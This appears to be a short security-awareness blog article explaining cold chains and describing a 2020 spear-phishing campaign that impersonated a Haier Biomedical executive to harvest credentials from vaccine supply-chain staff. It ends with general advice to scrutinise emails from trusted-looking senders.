Supply chains are desirable targets for cybercriminals
Before the world was able to roll out vaccines to its citizens, the cold chain delivery system was under covert attack by spear-phishing, most likely carried out by other nation-states.
What is a Cold Chain?
A cold chain is precisely what it sounds like: it is a supply chain used to transport temperature-sensitive products from location to location while maintaining their quality through a low-temperature range. This method is used most often for medical products such as medicines or vaccines.
Why Target Cold Chains?
Supply chains are desirable targets for cybercriminals because of the entities involved in the production and transport in the sensitive products involved. With a global health crisis like the one issued in by the COVID-19 pandemic, the cold chain involved in transporting vaccines internationally is an especially tempting target.
While most are familiar with mass phishing campaigns, which are usually easy to spot, spear-phishing is much more elaborate and far more high profile. Such a campaign requires extensive research on individuals with authority who can be impersonated to attain sensitive information. Threat actors will research names and roles within a company, targeting CEOS, global sales officers, purchasing managers, system administrators, sales reps, heads of marketing, etc., often with the goal of infecting devices with malware or extract information or money from individuals. In the case of the COVID-19 vaccine cold chain spear-phishing campaign, cybercriminals are attempting to steal credentials to gain privileged information.
When Did it Start?
With the first spear-phishing emails spotted early September, before the vaccine was approved for administration, officials and employees of targets have been warned to double check every new email they receive. The specific campaign in question impersonates an executive from Haier Biomedical, which is currently the world’s only complete cold chain provider.
The emails ask for price quotes regarding service contracts. The emails contain HTML attachments that open locally, requiring recipients to enter credentials before viewing the file. To address the possible motive behind the attack, Emsisoft threat analyst Brett Callow stated: “Disrupting the distribution of vaccines – and delaying getting them into people’s arms – could potentially provide the criminals with an enormous payday…” This gives us good insight into the political consequences that await the end-targets of these attacks.
It seems that the most immediate approach available to address this issue is caution on the part of the individuals involved in the cold chain delivery process. This highlights the need for the general population to practice scrutiny when opening emails from parties using a trusted name.